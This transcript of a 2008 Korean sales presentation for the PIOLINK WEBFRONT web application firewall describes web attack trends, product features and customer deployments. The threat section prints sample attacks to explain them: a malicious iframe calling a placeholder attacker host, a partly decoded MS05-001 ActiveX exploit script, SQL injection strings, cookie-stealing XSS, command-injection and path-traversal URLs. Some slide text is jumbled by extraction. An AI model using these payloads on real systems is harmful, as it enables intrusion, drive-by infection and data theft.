Transcript 웹방화벽 웹방화벽
차세대 웹방화벽 “WEBFRONT” 2008. 2. 29. 파이오링크 기술지원센터 ([email protected]) 차례 I 웹 해킹 동향 II 차세대 웹방화벽 ‘WEBFRONT’ III 기술지원 및 유지보수 정책 V 주요 구축 사례 1. 웹 해킹 동향 1) 해킹 동향 WEB은 왜 취약한가? • 구조적인 취약성 – 접근성: 내부 DB 시스템까지 접근하는 유일한 통로. (기존 방화벽은 port 80/443를 열어 놓음) – 모듈화: 3-tier의 별도의 모듈이 결합되고 Third Party에 의해 개발됨. – 원격 제어: 원격의 사용자에 입력에 따라 명령어 수행. 3 Tier Architecture ADO, ODBC, etc.. HTTP request (cleartext or SSL) Web Server Web Client 방화벽/IPS IE, Firefox, Netscape, Oprea HTTP reply (HTML, Javascript, VBscript, etc) Apache, IIS, IBM, Sun, Zeus, etc Web app Web app Web app Web app Websphere, OAS, Weblogic, JSP, Netscape, Perl, C/C++, etc Connector DB Connector DB Oracle, MS-SQL, Informix, MySQL PostgreSQL, Sybase, etc 웹 보안의 현주소 가용성만을 위한 투자 개발시 보안을 고려하지 않음 코드 리뷰의 어려움 중요 시스템만 관심 기존 보안 제품 한계 - 현재까지 애플리케이션의 가용성을 높이기위한 투자가 다수 (L4 Switch, Cluster, 네트워크장비 이중화) - 해킹으로 인한 서비스 정지가 더욱 심각함 - 애플리케이션 개발자와 보안 컨설턴트의 협력 필요 - 개발된 애플리케이션의 취약점을 수정하고 분석하는 반복된 작업 필요 - 이미 개발된 시스템에 대해 코드 리뷰를 통해 취약점을 찾기 어려움 - 발견된 취약점에 대해서도 수정이 어려움 - 중요 시스템은 보안이 잘되었음 (메인 홈페이지, 회계, 인사 시스템) - 이용자가 적거나 관리가 되지 않는 오래된 시스템은 취약 - 해커는 취약한 시스템을 해킹후 메인 시스템 해킹 (보안의 하향 평준화) - 기존의 방화벽, IDS, IPS의 시그니쳐 매칭 방식인 Negative 정책은 새로운 공격과 변종 공격에 대응하기 어려움 웹 해킹의 동향 - l • 해킹 사고의 유형 – 해킹사고의 유형 중 70%이상이 웹 취약성을 대상으로 함. HTTP (Port 80) NETBIOS (Port 139) Microsoft-DS (Port 445) Location Service (Port 135) ICMP Other Source : Network World August 2003 • 목적의 이동 – 사이버 머니, 온라인 게임, 인터넷 뱅킹, 쇼핑몰 증가, EC 활성화 – 단순 호기심, 정보 획득 -> 정치적, 경제적, 사회적 목적 化 정치, 군사적 호기심, 과시욕, SHIFT 경제적 취미 사회적 사이버 머니 탈취 계정 도용, 탈취 콘텐츠 탈취 홈페이지 변조 게시판 도배 DoS/DDoS 공격 웹 해킹의 동향 - ll 전문가 자동화 툴 일반인 유닉스 악성코드 윈도우 서버 개인정보유출 개인PC 1. 웹 해킹 동향 2) 중국발 해킹 중국 발 해킹 최근 금전적인 이익을 목적으로 시도되는 중국발 해킹 공격이나 피싱(Phishing) 공격이 꾸준히 증가, 해당 서버를 침해시키기 보다 신뢰성을 이용하여 보안에 취약한 사용자를 공격하는 매개체로 활용 중국 발 해킹 공격 홈페이지의 권한 획득 이후 IFRAME, 소스변조 등의 공격을 통해 악성프로그램 유포 및 개인정보 수집 서비스거부(DDoS) 악성프로그램에 감염된 여러대의 좀비 PC를 이용해 DDoS 공격 최근 금융권 싸이트를 대상으로 협박하여 금전을 요구 MS 취약점을 이용한 Zero Day 공격 패치가 발표되기 전 MS 취약점 이용 공격 코드 생성 및 악용 피싱 기법을 이용한 End-User 공격 스크립트, URL 스푸핑, 눈속임 등을 통한 공격 주로 금융권, 온라인 게임의 사이버 머니 및 아이템 불법 획득이 표적이 되고 있음 ActiveX 를 이용한 공격 홈페이지의 권한 획득 이후 또는 접근 가능한 서비스를 이용해 피싱이나 웜 바이러스의 유포 경로로 사이트 악용하거나 악성프로그램 유포 및 개인정보 수집 금전적인 이익을 위한 End-User PC 공격에 주로 활용 중국 발 해킹 - 시나리오 최근 중국측에서 홈페이지 변조 후 홈페이지 메인 페이지에 IFRAME을 삽입시켜 해커 컴퓨터의 특정 악성 페이지를 열람하도록 하여 일반 사용자가 변조된 홈페이지 방문 시 악성 프로그램이 설치되는 기법들을 주로 사용. 1 3 신뢰있는 기업의 홈페이지 서버 해킹 후 악성 스크립트 삽입 INTERNET 사용자 정보 획득 악성 IFRAME 삽입 IFRAME TAG 삽입 </map> <% 'Server.Execute "FX_xxxx.asp" %> <!-- // --><iframe src="http://www.xxxx.com/code.html" width="0" height="0"></iframe> </body></html> 악의적인 사용자(Cracker) 2 사이트 이용자 사이트 방문시 악성코드 감염 http://www.xxxx.com/code.html 공격자 홈페이지에 있는 공격 코드 <HTML> <script type="text/JScript.Encode">#@~^2REAAA==@!eOR www.xxxx.com/code.html @#@&7lD,3•z?DD~',J)$;f2w!C&9|d\HrhJ,_@#@&E}"? Pjj(I}C81N+WE,_@#@&rL4k%0VsxWa;MdY!\EP3@# Decoding된 공격 코드 decoding @&ES6X.TFy&cl•{%O_JJ~_@#@&r'Ei@#@&0!x^Ob <OBJECT id="cnbore2" type="application/x-oleobject“ Wx~n mGN••W`r w!Y#, classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> @#@&k ............. CVbN,4C/n•WP^tm.l1Yn.kPkU~DtnPbUaEO,Y•6Yc<PARAM name="Item1" EP3@#@&Jjlsr9P4md++cP14CDmm value='command;javascript:eval("document.write(\"<SCRIPT D+./~CM+~b t~,lR"BP! src=\\\"http://www.hackxxxx.com/xxxxx/bbs003302.gif\\\"\"+String.fromCha rCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'> - Javascript.Encode로 인코딩 된 것을 확인 - MS05-001 HTML Help Control ActiveX 취약점 이용한 공격 코드 중국 발 해킹 - ActiveX 취약점 공격 악의적인 ActiveX 컨트롤을 이용하여 사용자 컴퓨터 내 파일을 변조 또는 복사, 수정, 명령실행 등이 가능하며 레지스터리 값을 변경시켜 사용자의 컴퓨터에 심각한 피해를 입힐 수 있음. 신뢰있는 기업의 홈페이지 서버 1 3 해킹 후 악성 ActiveX 변조 INTERNET 사용자 정보 획득 임의 명령 실행 악성 embed 코드 악성 embed TAG 삽입 <object classid="clsid:66B30EA0-C033-4D4B-9F90EA0AF07363AF" codebase="http://so.xxx.co.kr/aaPlay_1.CAB#version= 1,2,0,3" height="300" width="300"><param name="PlayCount" value="0"></object> 악의적인 사용자(Cracker) 2 사이트 방문시 악성코드 감염 사이트 이용자 이미 설치된 Activex는 C:\WINDOWS\ Downloaded Program Files에서 찾아볼 수 있음. 중국 발 해킹 – 웹 DDoS 공격 악성프로그램에 감염된 다수의 좀비 PC에 명령을 통해 대상 웹 서비스에 문제를 발생 좀비PC의 대량화 및 상업화 추세 서비스 불가 다수의 좀비 공격 원격제어/DDoS 명령 1. 웹 해킹 동향 3) 웹 해킹 웹 공격의 유형 • ‘입력값 검증 부재’를 이용한 공격 예 Parameter tempering Invalid Method Forceful browsing Buffer overflow Cookie Poisoning 웹 해킹 - SQL Injection -취약점 설명 DB와 연동되는 웹 페이지의 특정한 파라메터 값에 특정 쿼리를 삽입하여 에러를 유도하고 인증을 우회하는 공격방법 -공격 방법 일반적으로 알려진 공격 코드 (‘ or 1=1–, ‘ or ‘’=‘, ’ or ‘a’=‘a) 자동화 공격툴 NBSI, HDSI등을 이용 웹 해킹 - XSS -취약점 설명 해커는 웹 페이지에 사회공학적인 방법을 이용하여 악성코드를 삽입하고 일반 사용자가 웹 페이지에 접속했을때 악성코드가 실행되어 개인정보등을 유출하는 공격 -공격 방법 공개된 게시판이나 웹 페이지에 악성스크립트를 삽입하여 개인정보 취득 <img src=javascript:alert(document.cookie)> <iframe src=”http://www.naver.com/index.html”> => 중국발 해킹에 많이 사용 웹 해킹 – Cookie Poisoning -취약점 설명 전송되는 쿠키를 재사용 하거나, 사용자 권한 레벨을 조정하여 권한 획득 -공격 방법 XSS 공격을 이용해 취득한 쿠키정보나, 자신의 쿠키를 변조하여 권한 획득 사용자의 권한이 레벨 5로 상승됨 웹 해킹 - 폼 필드 변조 -취약점 설명 구현된 웹 URL의 파라메터를 변조하여 예측이 가능한 게시물이나 사용자 정보를 획등하는 공격 -공격 방법 http://192.168.204.97/user_modify.asp?user_id=test test라는 파라메터값을 변조시켜 다른 사용자 정보를 획득함 웹 해킹 – 웹 DoS -취약점 설명 기존의 Network기반의 DoS공격보다 더 효율적인 공격 수단으로 단순하게 SYN, ACT, FIN이 아닌 실제적인 요청(GET, POST)로 서버의 부하를 증가시켜 서비스 마비 -공격 방법 학생이 단순하게 만든 툴을 이용하여 뜻을 같이한 학생 몇명이 모여 원서접수 사이트 공격 웹 해킹 - Command Injection -취약점 설명 시스템 명령을 직접내릴 수 있는 함수(쉘코드)에 악의적인 의도의 명령어를 삽입하여 실행하는 공격 -공격 방법 함수(쉘코드)를 웹 서버에 업로드 시킨 후 시스템 명령을 실행 http://192.168.204.97/cmdshell.asp?cmd=dir 웹 해킹 – Forceful Browsing - 웹 애플리케이션에서 저장된 자료에 다운로드를 제공하는 경우, 권한이 없는 접근자 도 다운로드 가능 - ‘다운로드 스크립트’를 이용하여 다운로드를 제공 하는 경우 URL칸의 인수값에 다양 한 문자열등을 입력 하여 비공개 콘텐츠의 유출 가능 유료 멀티미디어 파일을 임의로 접근할 수 있음 웹 해킹 - 파일 다운로드 -취약점 설명 파일 다운로드 기능에서 다은로드 받는 파일 명의 대한 필터링이 없을 경우 상위 디렉토리로 올라가서 시스템의 중요 파일들을 다운로드 받는 공격 -공격 방법 http://192.168.204.97/download-process.asp?dir=../../&fname=conf.xml http://192.168.204.97/download.asp?filename=../../../../../../etc/passwd 1. 웹 해킹 동향 4) 피해 사례 최근 피해 사례 I <08년 6월 한나라당 홈페이지> <08년 6월 경찰청 홈페이지> <08년 5월 중앙일보 홈페이지> 최근 피해 사례 II 게시판, 파일다운로드, Active X 설치등으로 숙주사이트로 인해 고객의 손해 유발 숙주 사이트에 대한 Cross Site Scripting, 책임 가중, 피싱, 파밍, 트로이 목마, 대규모 법적 소송으로 바이러스 유포 확대 • 온라인 게임 계정 악성 코드 유포 – 온라인 게임 계정 유출하는 트로이 목마 설치 (MhtRedir) – 사용자가 웹 사이트 방문만으로 감염이 됨. (신문사, 영어 학원, 영화관 해킹 사례) • 인터넷 뱅킹 해킹 사례 최근 피해 사례 III <http://www.krcert.or.kr KrCERT-AR-2007 아이템 거래사이트 대상 DDoS 공격사례 분석> 최근 피해 사례 IV Mass SQL Injection Mass Injection: 중국에서 Bot을 만들기 위해 대량의 SQL Injection이 가능한 툴을 개발, 무작위적으로 웹사이트 공격시도 2. 차세대 웹방화벽 “WEBFRONT” 웹 방화벽과 기존 보안장비와 차이점 Nimda LANd Buffer Overflow SQL Inj cmd.exe Telnet DOS Web XSS Code Red 웹 방화벽 NetBIOS 방화벽 IPS Server 웹 방화벽과 기존 보안장비와 차이점 IPS 웹 방화벽 Deep Packet Inspection Reassemble Isue Application Proxy 요청 검사 요청, 응답 검사 쿠키 암호화, 마스킹 기능 지원 Negative 정책 위주 Negative, Positive 정책 시스템 보안 모든 애플리케이션 보안 웹 서비스에 특화된 보안정책 IPS와 웹 방화벽은 경쟁 상태가 아닌 상호 보완 관계 웹방화벽의 동작 원리 웹방화벽 웹 서버 클라이언트 SYN SYN + ACK ACK • 보안 OK: 웹서버 전달 • 보안 No: 차단 GET/PUSH/POST (요청) • 보안 OK: 클라이언트 전달 • 보안 NO: 차단 * 필요시 데이터 변경 후 전달 Data (응답) FIN FIN + ACK ACK SYN SYN + ACK ACK GET/PUSH/POST (요청) Data (응답) FIN FIN + ACK ACK 웹방화벽의 데이터 처리 범위 웹 방화벽 클라이언트 웹 서버 요청시 보안 정책에 따라 요청/응답의 데이터 부분까지 확인해야 하므로 성능/안정 성을 기반으로 한 구현 필요 응답시 웹방화벽의 주요 기능 1. 요청검사 2. 컨텐츠 보호 어플리케이션 접근제어 폼 필드 검사 과다요청제어(Web DoS) 쿠키 보호 버퍼 오버 플로우 차단 SQL/스크립트 차단 업로드파일/요청형식 검사 검사회피차단 클라이언트 사용자 요청 User Request 검사를 통과한 응답 신용카드정보유출 차단 주민등록번호유출 차단 계좌번호유출차단 웹변조 방지 응답형식검사 코드노출 차단 사용자 요청 User Request 검사를 통과한 응답 검사를 통과한 요청 웹방화벽 서버 응답 Server Reply 4. 적응학습 3. 위장 어플리케이션접근제어 학습 폼필드 학습 쿠키 학습 SQL/스크립트(XSS) 학습 쉘코드 학습 URL 정보 위장 서버 정보 위장 웹 서버 WEBFRONT 보안 기능 - Request Validation 웹 보안의 가장 중요한 기능으로 클라이언트가 웹 서비스에 대한 요청을 보냈을 때 악의적 인 요청 및 침입을 검사하여 차단 방어하는 기능입니다. 요청 검사 (Request Validation) 클라이언트 사용자 요청 User Request 정상 요청 검사를 통과한 요청 웹 서버 불법 요청 세부항목 어플리케이션 접근 제어 (Application Access Control) 버퍼 오버플로우 차단 (Buffer Overflow Prevention) 폼 필드 무결성 검사 (Form Field Integrity Inspection) SQL 삽입 차단 (SQL Injection Prevention) 폼 필드 형식 검사 (Form Field Format Inspection) 스크립트 삽입 차단 (Cross Site Scripting Prevention) 쿠키 무결성 검사 (Cookie Integrity Inspection) 검사 회피 차단 (Evasion Detection) 쿠키 형식 검사 (Cookie Format Inspection) 요청 형식 검사 (Request Header Validation) 쿠키 접근 제어 (Cookie Access Control) 요청 방법 검사 (Request Method Validation) 과다 요청 검사 (Request Flood Inspection) WISE Filter™ WEBFRONT 보안 기능 - Content Protection 클라이언트 요청에 대한 웹 서비스의 응답을 확인하여 차단 또는 마스킹(Masking)하는 기능 으로 신용 카드나 주민등록번호 등의 개인 정보 및 서버 정보의 유출을 방지합니다. 컨텐트 보호 (Content Protection) 클라이언트 검사를 통과한 응답 검사를 통과한 응답 서버 응답 Server Reply 웹 서버 불법 응답 차단 세부항목 웹 변조 방지(Web Page Integrity Inspection) 신용 카드 정보 유출 차단(Credit Card Information Leakage Prevention) 주민 등록 번호 유출 차단(Social Security Number Leakage Prevention) 계좌 번호 유출 차단(Bank Account Number Leakage Prevention) 응답 형식 검사(Response Header Validation) 코드 노출 차단(comment masking) WISE Filter™ WEBFRONT 보안 기능 - Cloaking 서버 존을 가상화하고 서버 정보의 유출을 차단하여 클라이언트에게 실제 서버 존의 위치와 서버 정보를 숨기는 기능입니다. 웹 서버 클라이언트 위장된 응답 위장된 응답 서버응답 Server Reply 서버 위장 (Cloaking) Cloaking Information URL 상세 주소 IP Address TCP Port Number 서버의 개수, 종류 세부항목 WAS type URL 변환(Bi-directional URL Translation, WAT) 부적절한 에러 처리(Improper Error Handing) 서버 정보 위장 (Server Masquerading) 서버 부하 분산 (Server Load Balancing) Operating System Version Numbers Patch Levels WEBFRONT 보안 기능 - Adaptive Learning 정상적인 웹 서비스에 대한 요청과 응답을 기준으로 애플리케이션의 정보를 학습하는 기능으로 다양한 보안 정책을 간단하고 손쉽게 적용하도록 도와줍니다. Adaptive Learning 클라이언트 사용자 요청 User Request 검사를 통과한 응답 사용자 요청 User Request 검사를 통과한 요청 검사를 통과한 응답 서버 응답 Server Reply “A” => “A” “B” => “B” 세부항목 접근 제어 학습(Application Access Control) 폼 필드 학습(Form Field) 쿠키 학습(Cookie) SQL 사용 학습(SQL Usage) 스크립트 사용 학습(Scripting Usage) 쉘 코드 사용 학습(Shell code Usage) 웹 서버 PIOLINK 제품 로드맵 New-10G State of the Art Platform Design Enables Groundbreaking Performance 10G WF Analyzer Equipment Management System PAS 8000 WF-XG Security Manager PAS 5000 Multi giga PAS 4500 WF-SE PAS4000 Giga 9G PB2000 100M 0~3 G + 8~24 10/100M PB1508/PB1016 8~16 10/100BaseT 2002~2003 PAS3000 High Performance Flexible Multi Giga I/F Switch 2 G + 8~16 10/100M Parallel Contents Processing Engines boost true L7 switching and Security functions PAS1700 8~16 10/100M 2004 2005 2006 2007 2008 WEBFRONT의 제품 구성 WEBFRONT Analyzer WEBFRONT + 웹 서버 앞단에 위치하여 외부 해킹 및 정보유출로부터 웹 에플리케이션을 보호하는 파이오링크의 고성능/고용량 웹 보안 스위치 WEBFRONT로 부터 log 정보를 데이터베이스化하여 관리자에게 전문 리포팅 및 분석 자료를 제공하는 웹 보안 분석도구 WEBFRONT의 제품 구성 및 주요 스펙 • WEBFRONT 시리즈 PIOLINK PIOLINK WEBFRONT-XG WEBFRONT-SE Interface 16 UTP Gig 16 Fiber Gig 16 UTP Gig 16 Fiber Gig Power Dual Dual Hardware Bypass 2 Port 2 Port Switch Backplane 88 Gbps 88Gbps TPS 60,000 30,000 Throughput 4Gbps 1.5Gbps Concurrent Session 2,000,000 1,000,000 제품명 비고 외관 Combo 형태 Copper 국산 vs 외산 웹방화벽 비교 2004년쯤 국내에 소개된 웹 방화벽 제품은 외산이 처음 소개가 되었으며 2005년 부터 국산 제품들이 차별화를 선언하며 시장에 선보이게 됨. 구분 국산 외산 비고 생성시기 1~2년 3~4년 제품타입 서버(SW) 어플라이언스 스위치 서버(SW) 어플라이언스 스위치 보안기능 중상 중상 한글지원 가능 불가 국내 고객 선호 커스터마이징 (고객요구수용) 가능 불가 고객 선호 조건 보안성검토/인증 가능 불가 공공/교육기간 진입 장애 성능 관리편의성 경쟁제품비교 • vs WEBFRONT-XG 제품명 PIOLINK WEBFRONT-XG NetContinuum NC-2000 F5 Networks BIGIP-6800 Citrix Teros APS-200 iMPERVA G16 16 UTP Gig 4 Fiber Gig 2 UTP Gig 6 UTP Gig (Max 4 Fiber) 외관 2 UTP Gig (2 Fiber Option ) Interface 16 UTP Gig 16 Fiber Gig Hardware Bypass 2 Port X X X O (Inline Failopen I/f) Switch Backplane 88 Gbps X 44 Gbps x x TPS 60,000 40,000 N/A 8,000 16,000 Throughput 4Gbps 800Mbps 1Gbps 300Mbps 2Gbps Concurrent Session 2,000,000 1,000,000 2,000,000 500,000 1,000,000 경쟁제품비교 (~계속) • vs WEBFRONT-XG WEBFRONT-XG/SE 모니터랩 WI-1000 팬타시큐리티 WAPPLE1000 Interface 16 UTP Gig 16 Fiber Gig 4 UTP Gig 2 Fiber Gig 2 UTP Gig Hardware Bypass 2 Port 2 Port 2 Port Switch Backplane 88 Gbps Appliance Appliance TPS 60,000/30,000 9,000 10,000 Throughput 4Gbps/2Gbps 1Gbps 1Gbps Concurrent Session 2,000,000/1,000,000 500,000 500,000 제품명 PIOLINK 외관 성능/안정성(보안정책 적용 전/후) 웹 방화벽 특성상 정책 설정전의 기본성능과 보안정책 적용후의 성능 저하에 대한 충분한 검토 필요 기본 성능은 뛰어나나 정책적용 시 터무니 없는 성능 저하율 보임 TPS (Transection per Second) 100,000 기본 성능이 너무 낮음 80,000 60,000 기본성능 40,000 정책설정후 20,000 0 P 구분 F M P P F N M I P W N I 21,000 W 정책 전 60,000 85,000 9,000 10,000 정책설정 후 45,000 6,400 5,000 0 3,000 25% 92% 44% 100% 70% 변화율(%) 35,000 S 10,000 S 60,000 WEBFRONT 성능 평가 (고객 평균) TPS/CPS 60K 30K Concurrent 2M Sessions 1G 1M 4G Throughput (bps) 상 최상 고객 요구 수준 Latency WEBFRONT-XG 성능 WEBFRONT-SE 성능 WEBFRONT 고성능의 이유 기존 Proxy 방식 성능 저하 • C/S 개의 Socket 통신에 대한 overhead • 모든 커넥션이 Network Stack을 거치면서 발생하는 Overload -> 고성능 H/W로도 성능의 한계 Server Client WEBFRONT State Machine 기반 처리 방식 • 단순화된 Sate Machine 기반의 Delay Binding 구현 • TCP Overhead/Network Stack 단순화 -> 고성능 서비스 가능 * 특허출원번호 : 제 10-2004-0048404호 Client Server SSL 가속 (Option) HTTP HTTPS HTTP HTTP 적용 모델 • WEBFRONT SE / XG 성능 5000 cps, 10000 cps • 5,000 TPS, 10,000 TPS 라이센스 발행 기능 • 해시 알고리즘(Hash Algorithms) – Message Digest 5 (MD5) – SHA1 • 악수 프로토콜(Handshake Protocol) – SSL 3.0/3.1/TLS 1.0 – SSL 2.0 (Client Hello) – 세션 재사용(Session reuse) – 세션 재협상(Session renegotiation) • 알고리즘 – RC4, DES, 3DES, RSA, DH, DSA • 감시(Monitoring) – SSL 세션에 대한 다양한 통계 및 감시 기능 • SSL 세션 ID 지속(Stickiness) – SSL 모듈은 세션의 지속성을 유지함 WEBFRONT-부가기능 Server Load Balancing Network Security Telne t 클라이언트 FTP 웹 페이지 요 청 HTTP 요청 전 송 HTTP/ S Ping of Death TCP 세션 연결 HTTP 응답 전 송 Web Servers DoS/DDo S Web Applicati ons Database NetBIOS HTTP 요청 버 퍼링 & 실제 서버 선택 & HTTP 요청 전 송 SQL injection 쿠키변조 WOR M Buffer Overflow Virus Scan 방화 벽 IP Spoofing IPS WEB Applicati on Firewall Web Zone Transparent/High Availability HTTP 응답 전송 웹서 버 라우터 네트워크 방화 벽 웹 서버 WEBFRONT 유연한 네트워크 구성 • 인터페이스 유연성 – – – – 별도의 L2 switch 없이 최대 15대의 서버를 웹 방화벽에 직접 연결 광(Fiber) 케이블, UTP 케이블 자유자재로 연결 여러 개의 VLAN 세그먼트로 분리하여 보안성 향상 포트 트렁킹, 미러링으로 확장 용이 라우터 Port 트렁킹으로 WAN 대역폭 확장 모니터링을 위한 트래픽 미러링 10/100/1000 BASE-T UTP 통신 Mirroring 15대의 서버 직 접 연결 IDS, Mirroring Server VLAN-1 VLAN-N 1000 BASE-SX 광통신 관리의 편의성 예제 (한글, GUI) 3. 기술지원 및 유지보수 정책 웹방화벽은 기술지원이 중요합니다 • 웹 방화벽 도입은 보안성/안정성/(관리)편의성 등 여러가지 관점에 신중히 …. - 신중한 검토 없이 도입한 많은 고객이 이미 ‘무용지물’로 취급하는 경우 다수 • 제품 도입 전 충분한 검증을 통해 도입 결정 (실망 / 로컬 BMT) - 신뢰할 수 있는 제품 도입을 위해서는 담당자의 노력이 필요 • 웹 방화벽 도입 후 계속적인 관심을 가지고 운용해야 함 - 웹 서비스 분석과 함께 보안정책 적용 - 변경되는 웹 서비스에 따라 다른 보안정책 적용 - 시그니처의 주기적인 업데이트 시장 점유율이 높고, 기술지원이 원활환 제품 구매!! 기술지원 흐름도 • 단계 1: 준비 • 단계 2: 설치 • 단계 3: 운영 및 교육 • • • • 사이트 현황 파악 (네트워크, 어플리케이션, 보안정책) 취약점 분석(Web Scanner) 및 취약점 보고서 작성 설치(or BMT/데모) 계획서 준비 사전 테스트 (Lab) • • • • 학습모드(Learning Mode) 기반 서비스: Level 1 학습모드 결과 분석 및 적용 범위 결정 탐지모드(Alert Mode) 기반 서비스: Level 2 차단모드(Prevention Mode) 기반 서비스: Level 3 • 운영자 교육 (운영/모니터링/장애 처리 등) • 운영 및 유지보수 • 최신 웹 보안 관련 정보 제공 및 업데이트 유지보수 정책 • • 전문엔지니어를 보유하고 있는 공식 파트너를 통해 최고의 서비스 제공 Warranty 기간 : 12개월 (판매일 기준) Warranty In 파이오링크 공인 파트너 보안 정보 제공 /최신 펌웨어 릴리스 정보 제공 /버그 패치 설치/설정 /장애 대응을 포함한 기본적인 기술지원 공인 파트너와 유상 유지 보수 체결 Warranty Out 고객 정기 교육 참여, 장애 통보, 펌웨어 업그레이드 서비스 레벨에 따른 차별화된 서비스 (Gold/Silver/Bronze/Only HW) # Warranty Out시에는 계약한 업체가 파이오링크와 별도의 계약이 되어 있어야만 원 활한 서비스가 가능합니다. 4. 주요 구축 사례 WEBFRONT 도입 사례 2006년 출시 이후에 대형 고객으로부터 혹독한 검증을 거쳐 선정됨. 수십대의 서버가 있는 DMZ 앞에 (A통신사) A사 구축사례 특징 • 국내 최대 무선 Telco. 사업자로서, 국내외 WAF 중 8개사를 대상으로 제품 선정 작업 실시 • 국내 WAF BMT 사상 처음으로 2GB 성능부하 측정 • NSS/OWASP/WASC 등의 객관적 국제 평가 기준을 적용 기능 평가 • 도입시 중요사항 : 성능/안정성, 보안성, 확장성 L4_1 FW_1 WAF_1 Switch_1 DMZ Internet L4_2 WAF_2 FW_1 외산 도입 실패 경험 (안정성), 모의 침투 테스트(w/ 설문지), 약 30개 서비스 Switch_2 Analyzer L4를 이용해 한꺼번에 4대를 병렬로 (B사) B사 구축사례 특징 • • • • 국내 최대 유선 Telco. 사업자로서, 국내 WAF중 3개사를 대상으로 제품 선정 작업 실시 WAF BMT시 1GB 성능 부하 측정, Active-Active HA 구성 NSS/OWASP/WASC 등의 객관적 국제 평가 기준을 활용 기능 평가 도입시 중요 사항: 성능,안정성, 보안성, 커스터마이징 L4_2 L4_1 WAF_2 WAF_1 L4_3 DMZ_1 WAF_3 WAF_4 L4_4 DMZ_2 외산 도입 실패 경험 (안정성/서비스), 웹스캐닝 + 설문지, 약 150개 서비스 서버가 너무 많아 관문에 (C연구기관) C연구기관 구축사례 특징 • 국내사 대상으로 자체 기준에 따라 선정 • 별도 BMT 시 없음 • 도입시 중요사항: 성능, 안정성, 인지도 IPS DMZ_1 WAF 내부망 FW DMZ_2 보안사고 우려 초기 도입, 웹스캐닝+설문지, 약 30개 서비스 L4없이 WAF+HA+LB를 한꺼번에 (D병원) D병원 구축사례 특징 WAF_1 (Active) • • • • • MS Window 2003 랜카드 이중화 구성 WAF Active-Standby 이중화 구성 서버 웹방화벽 기능과 SLB(Server Load Balancing) 동시 구현 사전 보안취약성 검토 후, 각 취약점에 적합한 보안 설정 Decision Factors : 성능, 안정성, 보안성 WAF_2 (standby) WAF + 서버 로드 밸런싱, 이중화, 설문지, 약 20개 서비스 기존 구성에 Transparent 하게 [E공사) • 국내사 5개 대상 최상위 제품으로 로컬 BMT • 고객 서비스 부분으로 업체별 1일의 성능/보안성/안정성 테스트 • 도입시 중요사항: 성능, 안정성, 보안성 E공사 구축사례 특징 안정성, 웹스캐닝 + <관문> 설문지, 약 30개 서비스 <DMZ> 서버 팜 서버 팜 외부 서비스 존과 내부 서비스 존에 각각 [F도청) • 국내 제품 대상으로 선정 도입 검토 • 자체 기준으로 안정적이고 최고의 성능 서비스 가능 여부 검토 • 도입시 중요사항: 성능, 안정성, 보안성 F도청 구축사례 특징 Internet 인터넷라우터 사용자 공개용 서버 라우터 사용자 웹방화벽 방화벽 구간 연계 기관 암호화 구간 내부용 서버 웹방화벽 백본 스위치 별개의 서비스에 각각 구성, 설문지, 약 30개 서비스 사용자 사용자 DMZ 서비스에 기존 L4와 연동 [G대학교) G대학교 구축사례 특징 • 국내 제품 대상으로 선정 도입 검토 • 실망 테스트 후 서비스 가능 여부 결정 (교육부 SIMS 연동 예정) • 도입시 중요사항: 성능, 안정성, 보안성 FW_1 B/B_1 L4_1 L4_1 FW_2 Internet 웹방화벽 (KT, Dacom, 웹방화벽 KISTI, EPNet…) B/B_2 L4_2 DMZ WAF_2 FW_3 L4_2 FW_4 L4의 LB기능 이용, HTTP만 Redirection, 설문지, 약 117개 서비스, 일부는 세부 Q&A